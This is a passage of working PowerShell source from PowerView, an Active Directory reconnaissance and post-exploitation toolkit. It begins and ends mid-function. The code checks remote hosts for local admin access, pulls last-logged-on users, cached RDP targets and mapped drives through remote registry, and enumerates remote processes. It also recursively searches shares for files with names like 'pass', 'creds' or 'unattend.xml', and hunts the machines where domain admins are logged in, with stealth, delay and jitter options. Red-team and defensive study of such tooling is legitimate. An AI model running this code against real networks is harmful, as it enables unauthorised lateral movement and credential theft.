$Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() if($Result -eq 0) { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError2).Message)" } else { $Offset2 = $ppBuffer.ToInt64() $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2 $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS $SourceIP = $Info2.Address if($SourceIP[2] -ne 0) { $SourceIP = [String]$SourceIP[2]+"."+[String]$SourceIP[3]+"."+[String]$SourceIP[4]+"."+[String]$SourceIP[5] } else { $SourceIP = $Null } $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP $RDPSession # free up the memory buffer $Null = $Wtsapi32::WTSFreeMemory($ppBuffer) $Offset += $Increment } } # free up the memory result buffer $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount) } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" } # Close off the service handle $Null = $Wtsapi32::WTSCloseServer($Handle) } else { Write-Verbose "Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName" } } filter Invoke-CheckLocalAdminAccess { <# .SYNOPSIS This function will use the OpenSCManagerW Win32API call to establish a handle to the remote host. If this succeeds, the current user context has local administrator acess to the target. Idea stolen from the local_admin_search_enum post module in Metasploit written by: 'Brandon McCann "zeknox" ' 'Thomas McCarthy "smilingraccoon" ' 'Royce Davis "r3dy" ' .PARAMETER ComputerName The hostname to query for active sessions. .OUTPUTS $True if the current user has local admin access to the hostname, $False otherwise .EXAMPLE PS C:\> Invoke-CheckLocalAdminAccess -ComputerName sqlserver Returns active sessions on the local host. .EXAMPLE PS C:\> Get-NetComputer | Invoke-CheckLocalAdminAccess Sees what machines in the domain the current user has access to. .LINK https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost' ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # 0xF003F - SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() Write-Verbose "Invoke-CheckLocalAdminAccess handle: $Handle" $IsAdmin = New-Object PSObject $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer # if we get a non-zero handle back, everything was successful if ($Handle -ne 0) { $Null = $Advapi32::CloseServiceHandle($Handle) $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True } else { Write-Verbose "Error: $(([ComponentModel.Win32Exception] $LastError).Message)" $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False } $IsAdmin } filter Get-SiteName { <# .SYNOPSIS This function will use the DsGetSiteName Win32API call to look up the name of the site where a specified computer resides. .PARAMETER ComputerName The hostname to look the site up for, default to localhost. .EXAMPLE PS C:\> Get-SiteName -ComputerName WINDOWS1 Returns the site for WINDOWS1.testlab.local. .EXAMPLE PS C:\> Get-NetComputer | Get-SiteName Returns the sites for every machine in AD. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = $Env:ComputerName ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # if we get an IP address, try to resolve the IP to a hostname if($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') { $IPAddress = $Computer $Computer = [System.Net.Dns]::GetHostByAddress($Computer) } else { $IPAddress = @(Get-IPAddress -ComputerName $Computer)[0].IPAddress } $PtrInfo = [IntPtr]::Zero $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo) $ComputerSite = New-Object PSObject $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress if ($Result -eq 0) { $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo) $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename } else { $ErrorMessage = "Error: $(([ComponentModel.Win32Exception] $Result).Message)" $ComputerSite | Add-Member Noteproperty 'SiteName' $ErrorMessage } $Null = $Netapi32::NetApiBufferFree($PtrInfo) $ComputerSite } filter Get-LastLoggedOn { <# .SYNOPSIS This function uses remote registry functionality to return the last user logged onto a target machine. Note: This function requires administrative rights on the machine you're enumerating. .PARAMETER ComputerName The hostname to query for the last logged on user. Defaults to the localhost. .PARAMETER Credential A [Management.Automation.PSCredential] object for the remote connection. .EXAMPLE PS C:\> Get-LastLoggedOn Returns the last user logged onto the local machine. .EXAMPLE PS C:\> Get-LastLoggedOn -ComputerName WINDOWS1 Returns the last user logged onto WINDOWS1 .EXAMPLE PS C:\> Get-NetComputer | Get-LastLoggedOn Returns the last user logged onto all machines in the domain. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost', [Management.Automation.PSCredential] $Credential ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # HKEY_LOCAL_MACHINE $HKLM = 2147483650 # try to open up the remote registry key to grab the last logged on user try { if($Credential) { $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue } else { $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue } $Key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI" $Value = "LastLoggedOnUser" $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue $LastLoggedOn = New-Object PSObject $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser $LastLoggedOn } catch { Write-Warning "[!] Error opening remote registry on $Computer. Remote registry likely not enabled." } } filter Get-CachedRDPConnection { <# .SYNOPSIS Uses remote registry functionality to query all entries for the "Windows Remote Desktop Connection Client" on a machine, separated by user and target server. Note: This function requires administrative rights on the machine you're enumerating. .PARAMETER ComputerName The hostname to query for RDP client information. Defaults to localhost. .PARAMETER Credential A [Management.Automation.PSCredential] object for the remote connection. .EXAMPLE PS C:\> Get-CachedRDPConnection Returns the RDP connection client information for the local machine. .EXAMPLE PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local Returns the RDP connection client information for the WINDOWS2.testlab.local machine .EXAMPLE PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local -Credential $Cred Returns the RDP connection client information for the WINDOWS2.testlab.local machine using alternate credentials. .EXAMPLE PS C:\> Get-NetComputer | Get-CachedRDPConnection Get cached RDP information for all machines in the domain. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost', [Management.Automation.PSCredential] $Credential ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # HKEY_USERS $HKU = 2147483651 try { if($Credential) { $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue } else { $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue } # extract out the SIDs of domain users in this hive $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } foreach ($UserSID in $UserSIDs) { try { $UserName = Convert-SidToName $UserSID # pull out all the cached RDP connections $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames foreach ($Connection in $ConnectionKeys) { # make sure this key is a cached connection if($Connection -match 'MRU.*') { $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue $FoundConnection = New-Object PSObject $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer $FoundConnection | Add-Member Noteproperty 'UserName' $UserName $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null $FoundConnection } } # pull out all the cached server info with username hints $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames foreach ($Server in $ServerKeys) { $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue $FoundConnection = New-Object PSObject $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer $FoundConnection | Add-Member Noteproperty 'UserName' $UserName $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint $FoundConnection } } catch { Write-Verbose "Error: $_" } } } catch { Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" } } filter Get-RegistryMountedDrive { <# .SYNOPSIS Uses remote registry functionality to query all entries for the the saved network mounted drive on a machine, separated by user and target server. Note: This function requires administrative rights on the machine you're enumerating. .PARAMETER ComputerName The hostname to query for RDP client information. Defaults to localhost. .PARAMETER Credential A [Management.Automation.PSCredential] object for the remote connection. .EXAMPLE PS C:\> Get-RegistryMountedDrive Returns the saved network mounted drives for the local machine. .EXAMPLE PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local Returns the saved network mounted drives for the WINDOWS2.testlab.local machine .EXAMPLE PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local -Credential $Cred Returns the saved network mounted drives for the WINDOWS2.testlab.local machine using alternate credentials. .EXAMPLE PS C:\> Get-NetComputer | Get-RegistryMountedDrive Get the saved network mounted drives for all machines in the domain. #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = 'localhost', [Management.Automation.PSCredential] $Credential ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField # HKEY_USERS $HKU = 2147483651 try { if($Credential) { $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue } else { $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue } # extract out the SIDs of domain users in this hive $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } foreach ($UserSID in $UserSIDs) { try { $UserName = Convert-SidToName $UserSID $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames ForEach($DriveLetter in $DriveLetters) { $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue if(-not $UserName) { $UserName = '' } if($RemotePath -and ($RemotePath -ne '')) { $MountedDrive = New-Object PSObject $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer $MountedDrive | Add-Member Noteproperty 'UserName' $UserName $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName $MountedDrive } } } catch { Write-Verbose "Error: $_" } } } catch { Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" } } filter Get-NetProcess { <# .SYNOPSIS Gets a list of processes/owners on a remote machine. .PARAMETER ComputerName The hostname to query processes. Defaults to the local host name. .PARAMETER Credential A [Management.Automation.PSCredential] object for the remote connection. .EXAMPLE PS C:\> Get-NetProcess -ComputerName WINDOWS1 Returns the current processes for WINDOWS1 #> [CmdletBinding()] param( [Parameter(ValueFromPipeline=$True)] [Alias('HostName')] [Object[]] [ValidateNotNullOrEmpty()] $ComputerName = [System.Net.Dns]::GetHostName(), [Management.Automation.PSCredential] $Credential ) # extract the computer name from whatever object was passed on the pipeline $Computer = $ComputerName | Get-NameField try { if($Credential) { $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName -Credential $Credential } else { $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName } $Processes | ForEach-Object { $Owner = $_.getowner(); $Process = New-Object PSObject $Process | Add-Member Noteproperty 'ComputerName' $Computer $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID $Process | Add-Member Noteproperty 'Domain' $Owner.Domain $Process | Add-Member Noteproperty 'User' $Owner.User $Process } } catch { Write-Verbose "[!] Error enumerating remote processes on $Computer, access likely denied: $_" } } function Find-InterestingFile { <# .SYNOPSIS This function recursively searches a given UNC path for files with specific keywords in the name (default of pass, sensitive, secret, admin, login and unattend*.xml). The output can be piped out to a csv with the -OutFile flag. By default, hidden files/folders are included in search results. .PARAMETER Path UNC/local path to recursively search. .PARAMETER Terms Terms to search for. .PARAMETER OfficeDocs Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) .PARAMETER FreshEXEs Switch. Find .EXEs accessed within the last week. .PARAMETER LastAccessTime Only return files with a LastAccessTime greater than this date value. .PARAMETER LastWriteTime Only return files with a LastWriteTime greater than this date value. .PARAMETER CreationTime Only return files with a CreationTime greater than this date value. .PARAMETER ExcludeFolders Switch. Exclude folders from the search results. .PARAMETER ExcludeHidden Switch. Exclude hidden files and folders from the search results. .PARAMETER CheckWriteAccess Switch. Only returns files the current user has write access to. .PARAMETER OutFile Output results to a specified csv output file. .PARAMETER UsePSDrive Switch. Mount target remote path with temporary PSDrives. .OUTPUTS The full path, owner, lastaccess time, lastwrite time, and size for each found file. .EXAMPLE PS C:\> Find-InterestingFile -Path C:\Backup\ Returns any files on the local path C:\Backup\ that have the default search term set in the title. .EXAMPLE PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -Terms salaries,email -OutFile out.csv Returns any files on the remote path \\WINDOWS7\Users\ that have 'salaries' or 'email' in the title, and writes the results out to a csv file named 'out.csv' .EXAMPLE PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -LastAccessTime (Get-Date).AddDays(-7) Returns any files on the remote path \\WINDOWS7\Users\ that have the default search term set in the title and were accessed within the last week. .LINK http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/ #> param( [Parameter(ValueFromPipeline=$True)] [String] $Path = '.\', [Alias('Terms')] [String[]] $SearchTerms = @('pass', 'sensitive', 'admin', 'login', 'secret', 'unattend*.xml', '.vmdk', 'creds', 'credential', '.config'), [Switch] $OfficeDocs, [Switch] $FreshEXEs, [String] $LastAccessTime, [String] $LastWriteTime, [String] $CreationTime, [Switch] $ExcludeFolders, [Switch] $ExcludeHidden, [Switch] $CheckWriteAccess, [String] $OutFile, [Switch] $UsePSDrive ) begin { $Path += if(!$Path.EndsWith('\')) {"\"} if ($Credential) { $UsePSDrive = $True } # append wildcards to the front and back of all search terms $SearchTerms = $SearchTerms | ForEach-Object { if($_ -notmatch '^\*.*\*$') {"*$($_)*"} else{$_} } # search just for office documents if specified if ($OfficeDocs) { $SearchTerms = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx') } # find .exe's accessed within the last 7 days if($FreshEXEs) { # get an access time limit of 7 days ago $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy') $SearchTerms = '*.exe' } if($UsePSDrive) { # if we're PSDrives, create a temporary mount point $Parts = $Path.split('\') $FolderPath = $Parts[0..($Parts.length-2)] -join '\' $FilePath = $Parts[-1] $RandDrive = ("abcdefghijklmnopqrstuvwxyz".ToCharArray() | Get-Random -Count 7) -join '' Write-Verbose "Mounting path '$Path' using a temp PSDrive at $RandDrive" try { $Null = New-PSDrive -Name $RandDrive -PSProvider FileSystem -Root $FolderPath -ErrorAction Stop } catch { Write-Verbose "Error mounting path '$Path' : $_" return $Null } # so we can cd/dir the new drive $Path = "${RandDrive}:\${FilePath}" } } process { Write-Verbose "[*] Search path $Path" function Invoke-CheckWrite { # short helper to check is the current user can write to a file [CmdletBinding()]param([String]$Path) try { $Filetest = [IO.FILE]::OpenWrite($Path) $Filetest.Close() $True } catch { Write-Verbose -Message $Error[0] $False } } $SearchArgs = @{ 'Path' = $Path 'Recurse' = $True 'Force' = $(-not $ExcludeHidden) 'Include' = $SearchTerms 'ErrorAction' = 'SilentlyContinue' } Get-ChildItem @SearchArgs | ForEach-Object { Write-Verbose $_ # check if we're excluding folders if(!$ExcludeFolders -or !$_.PSIsContainer) {$_} } | ForEach-Object { if($LastAccessTime -or $LastWriteTime -or $CreationTime) { if($LastAccessTime -and ($_.LastAccessTime -gt $LastAccessTime)) {$_} elseif($LastWriteTime -and ($_.LastWriteTime -gt $LastWriteTime)) {$_} elseif($CreationTime -and ($_.CreationTime -gt $CreationTime)) {$_} } else {$_} } | ForEach-Object { # filter for write access (if applicable) if((-not $CheckWriteAccess) -or (Invoke-CheckWrite -Path $_.FullName)) {$_} } | Select-Object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,CreationTime,Length | ForEach-Object { # check if we're outputting to the pipeline or an output file if($OutFile) {Export-PowerViewCSV -InputObject $_ -OutFile $OutFile} else {$_} } } end { if($UsePSDrive -and $RandDrive) { Write-Verbose "Removing temp PSDrive $RandDrive" Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force } } } ######################################################## # # 'Meta'-functions start below # ######################################################## function Invoke-ThreadedFunction { # Helper used by any threaded host enumeration functions [CmdletBinding()] param( [Parameter(Position=0,Mandatory=$True)] [String[]] $ComputerName, [Parameter(Position=1,Mandatory=$True)] [System.Management.Automation.ScriptBlock] $ScriptBlock, [Parameter(Position=2)] [Hashtable] $ScriptParameters, [Int] [ValidateRange(1,100)] $Threads = 20, [Switch] $NoImports ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } Write-Verbose "[*] Total number of hosts: $($ComputerName.count)" # Adapted from: # http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/ $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState() # import the current session state's variables and functions so the chained PowerView # functionality can be used by the threaded blocks if(!$NoImports) { # grab all the current variables for this runspace $MyVars = Get-Variable -Scope 2 # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumFunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true") # Add Variables from Parent Scope (current runspace) into the InitialSessionState ForEach($Var in $MyVars) { if($VorbiddenVars -NotContains $Var.Name) { $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes)) } } # Add Functions from current runspace to the InitialSessionState ForEach($Function in (Get-ChildItem Function:)) { $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition)) } } # threading adapted from # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407 # Thanks Carlos! # create a pool of maxThread runspaces $Pool = [runspacefactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host) $Pool.Open() $method = $null ForEach ($m in [PowerShell].GetMethods() | Where-Object { $_.Name -eq "BeginInvoke" }) { $methodParameters = $m.GetParameters() if (($methodParameters.Count -eq 2) -and $methodParameters[0].Name -eq "input" -and $methodParameters[1].Name -eq "output") { $method = $m.MakeGenericMethod([Object], [Object]) break } } $Jobs = @() } process { ForEach ($Computer in $ComputerName) { # make sure we get a server name if ($Computer -ne '') { # Write-Verbose "[*] Enumerating server $Computer ($($Counter+1) of $($ComputerName.count))" While ($($Pool.GetAvailableRunspaces()) -le 0) { Start-Sleep -MilliSeconds 500 } # create a "powershell pipeline runner" $p = [powershell]::create() $p.runspacepool = $Pool # add the script block + arguments $Null = $p.AddScript($ScriptBlock).AddParameter('ComputerName', $Computer) if($ScriptParameters) { ForEach ($Param in $ScriptParameters.GetEnumerator()) { $Null = $p.AddParameter($Param.Name, $Param.Value) } } $o = New-Object Management.Automation.PSDataCollection[Object] $Jobs += @{ PS = $p Output = $o Result = $method.Invoke($p, @($null, [Management.Automation.PSDataCollection[Object]]$o)) } } } } end { Write-Verbose "Waiting for threads to finish..." Do { ForEach ($Job in $Jobs) { $Job.Output.ReadAll() } } While (($Jobs | Where-Object { ! $_.Result.IsCompleted }).Count -gt 0) ForEach ($Job in $Jobs) { $Job.PS.Dispose() } $Pool.Dispose() Write-Verbose "All threads completed!" } } function Invoke-UserHunter { <# .SYNOPSIS Finds which machines users of a specified group are logged into. Author: @harmj0y License: BSD 3-Clause .DESCRIPTION This function finds the local domain name for a host using Get-NetDomain, queries the domain for users of a specified group (default "domain admins") with Get-NetGroupMember or reads in a target user list, queries the domain for all active machines with Get-NetComputer or reads in a pre-populated host list, randomly shuffles the target list, then for each server it gets a list of active users with Get-NetSession/Get-NetLoggedon. The found user list is compared against the target list, and a status message is displayed for any hits. The flag -CheckAccess will check each positive host to see if the current user has local admin access to the machine. .PARAMETER ComputerName Host array to enumerate, passable on the pipeline. .PARAMETER ComputerFile File of hostnames/IPs to search. .PARAMETER ComputerFilter Host filter name to query AD for, wildcards accepted. .PARAMETER ComputerADSpath The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER Unconstrained Switch. Only enumerate computers that have unconstrained delegation. .PARAMETER GroupName Group name to query for target users. .PARAMETER TargetServer Hunt for users who are effective local admins on a target server. .PARAMETER UserName Specific username to search for. .PARAMETER UserFilter A customized ldap filter string to use for user enumeration, e.g. "(description=*admin*)" .PARAMETER UserADSpath The LDAP source to search through for users, e.g. "LDAP://OU=secret,DC=testlab,DC=local" Useful for OU queries. .PARAMETER UserFile File of usernames to search for. .PARAMETER AdminCount Switch. Hunt for users with adminCount=1. .PARAMETER AllowDelegation Switch. Return user accounts that are not marked as 'sensitive and not allowed for delegation' .PARAMETER StopOnSuccess Switch. Stop hunting after finding after finding a target user. .PARAMETER NoPing Don't ping each host to ensure it's up before enumerating. .PARAMETER CheckAccess Switch. Check if the current user has local admin access to found machines. .PARAMETER Delay Delay between enumerating hosts, defaults to 0 .PARAMETER Jitter Jitter for the host delay, defaults to +/- 0.3 .PARAMETER Domain Domain for query for machines, defaults to the current domain. .PARAMETER DomainController Domain controller to reflect LDAP queries through. .PARAMETER ShowAll Switch. Return all user location results, i.e. Invoke-UserView functionality. .PARAMETER SearchForest Switch. Search all domains in the forest for target users instead of just a single domain. .PARAMETER Stealth Switch. Only enumerate sessions from connonly used target servers. .PARAMETER StealthSource The source of target servers to use, 'DFS' (distributed file servers), 'DC' (domain controllers), 'File' (file servers), or 'All' .PARAMETER ForeignUsers Switch. Only return results that are not part of searched domain. .PARAMETER Threads The maximum concurrent threads to execute. .PARAMETER Poll Continuously poll for sessions for the given duration. Automatically sets Threads to the number of computers being polled. .EXAMPLE PS C:\> Invoke-UserHunter -CheckAccess Finds machines on the local domain where domain admins are logged into and checks if the current user has local administrator access. .EXAMPLE PS C:\> Invoke-UserHunter -Domain 'testing' Finds machines on the 'testing' domain where domain admins are logged into. .EXAMPLE PS C:\> Invoke-UserHunter -Threads 20 Multi-threaded user hunting, replaces Invoke-UserHunterThreaded. .EXAMPLE PS C:\> Invoke-UserHunter -UserFile users.txt -ComputerFile hosts.txt Finds machines in hosts.txt where any members of users.txt are logged in or have sessions. .EXAMPLE PS C:\> Invoke-UserHunter -GroupName "Power Users" -Delay 60 Find machines on the domain where members of the "Power Users" groups are logged into with a 60 second (+/- *.3) randomized delay between touching each host. .EXAMPLE PS C:\> Invoke-UserHunter -TargetServer FILESERVER Query FILESERVER for useres who are effective local administrators using Get-NetLocalGroup -Recurse, and hunt for that user set on the network. .EXAMPLE PS C:\> Invoke-UserHunter -SearchForest Find all machines in the current forest where domain admins are logged in. .EXAMPLE PS C:\> Invoke-UserHunter -Stealth Executes old Invoke-StealthUserHunter functionality, enumerating commonly used servers and checking just sessions for each. .EXAMPLE PS C:\> Invoke-UserHunter -Stealth -StealthSource DC -Poll 3600 -Delay 5 -ShowAll | ? { ! $_.UserName.EndsWith('$') } Poll Domain Controllers in parallel for sessions for an hour, waiting five seconds before querying each DC again and filtering out computer accounts. .LINK http://blog.harmj0y.net #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipeline=$True)] [Alias('Hosts')] [String[]] $ComputerName, [ValidateScript({Test-Path -Path $_ })] [Alias('HostList')] [String] $ComputerFile, [String] $ComputerFilter, [String] $ComputerADSpath, [Switch] $Unconstrained, [String] $GroupName = 'Domain Admins', [String] $TargetServer, [String] $UserName, [String] $UserFilter, [String] $UserADSpath, [ValidateScript({Test-Path -Path $_ })] [String] $UserFile, [Switch] $AdminCount, [Switch] $AllowDelegation, [Switch] $CheckAccess, [Switch] $StopOnSuccess, [Switch] $NoPing, [UInt32] $Delay = 0, [Double] $Jitter = .3, [String] $Domain, [String] $DomainController, [Switch] $ShowAll, [Switch] $SearchForest, [Switch] $Stealth, [String] [ValidateSet("DFS","DC","File","All")] $StealthSource ="All", [Switch] $ForeignUsers, [Int] [ValidateRange(1,100)] $Threads, [UInt32] $Poll = 0 ) begin { if ($PSBoundParameters['Debug']) { $DebugPreference = 'Continue' } Write-Verbose "[*] Running Invoke-UserHunter with delay of $Delay" ##################################################### # # First we build the host target set # ##################################################### if($ComputerFile) { # if we're using a host list, read the targets in and add them to the target list $ComputerName = Get-Content -Path $ComputerFile } if(!$ComputerName) { [Array]$ComputerName = @() if($Domain) { $TargetDomains = @($Domain) } elseif($SearchForest) { # get ALL the domains in the forest to search $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name } } else { # use the local domain $TargetDomains = @( (Get-NetDomain).name ) } if($Stealth) { Write-Verbose "Stealth mode! Enumerating commonly used servers" Write-Verbose "Stealth source: $StealthSource" ForEach ($Domain in $TargetDomains) { if (($StealthSource -eq "File") -or ($StealthSource -eq "All")) { Write-Verbose "[*] Querying domain $Domain for File Servers..." $ComputerName += Get-NetFileServer -Domain $Domain -DomainController $DomainController } if (($StealthSource -eq "DFS") -or ($StealthSource -eq "All")) { Write-Verbose "[*] Querying domain $Domain for DFS Servers..." $ComputerName += Get-DFSshare -Domain $Domain -DomainController $DomainController | ForEach-Object {$_.RemoteServerName} } if (($StealthSource -eq "DC") -or ($StealthSource -eq "All")) { Write-Verbose "[*] Querying domain $Domain for Domain Controllers..." $ComputerName += Get-NetDomainController -LDAP -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.dnshostname} } } } else { ForEach ($Domain in $TargetDomains) { Write-Verbose "[*] Querying domain $Domain for hosts" $Arguments = @{ 'Domain' = $Domain 'DomainController' = $DomainController 'ADSpath' = $ADSpath 'Filter' = $ComputerFilter 'Unconstrained' = $Unconstrained } $ComputerName += Get-NetComputer @Arguments } } # remove any null target hosts, uniquify the list and shuffle it $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random } if($($ComputerName.Count) -eq 0) { throw "No hosts found!" } } if ($Poll -gt 0) { Write-Verbose "[*] Polling for $Poll seconds. Automatically enabling threaded mode." if ($ComputerName.Count -gt 100) { throw "Too many hosts to poll! Try fewer than 100." } $Threads = $ComputerName.Count } ##################################################### # # Now we build the user target set # ##################################################### # users we're going to be searching for $TargetUsers = @() # get the current user so we can ignore it in the results $CurrentUser = ([Environment]::UserName).toLower() # if we're showing all results, skip username enumeration if($ShowAll -or $ForeignUsers) { $User = New-Object PSObject $User | Add-Member Noteproperty 'MemberDomain' $Null $User | Add-Member Noteproperty 'MemberName' '*' $TargetUsers = @($User) if($ForeignUsers) { # if we're searching for user results not in the primary domain $krbtgtName = Convert-ADName -ObjectName "krbtgt@$($Domain)" -InputType Simple -OutputType NT4 $DomainShortName = $krbtgtName.split("\")[0] } } # if we want to hunt for the effective domain users who can access a target server elseif($TargetServer) { Write-Verbose "Querying target server '$TargetServer' for local users" $TargetUsers = Get-NetLocalGroup $TargetServer -Recurse | Where-Object {(-not $_.IsGroup) -and $_.IsDomain } | ForEach-Object { $User = New-Object PSObject $User | Add-Member Noteproperty 'MemberDomain' ($_.AccountName).split("/")[0].toLower() $User | Add-Member Noteproperty 'MemberName' ($_.AccountName).split("/")[1].toLower() $User } | Where-Object {$_} } # if we get a specific username, only use that elseif($UserName) { Write-Verbose "[*] Using target 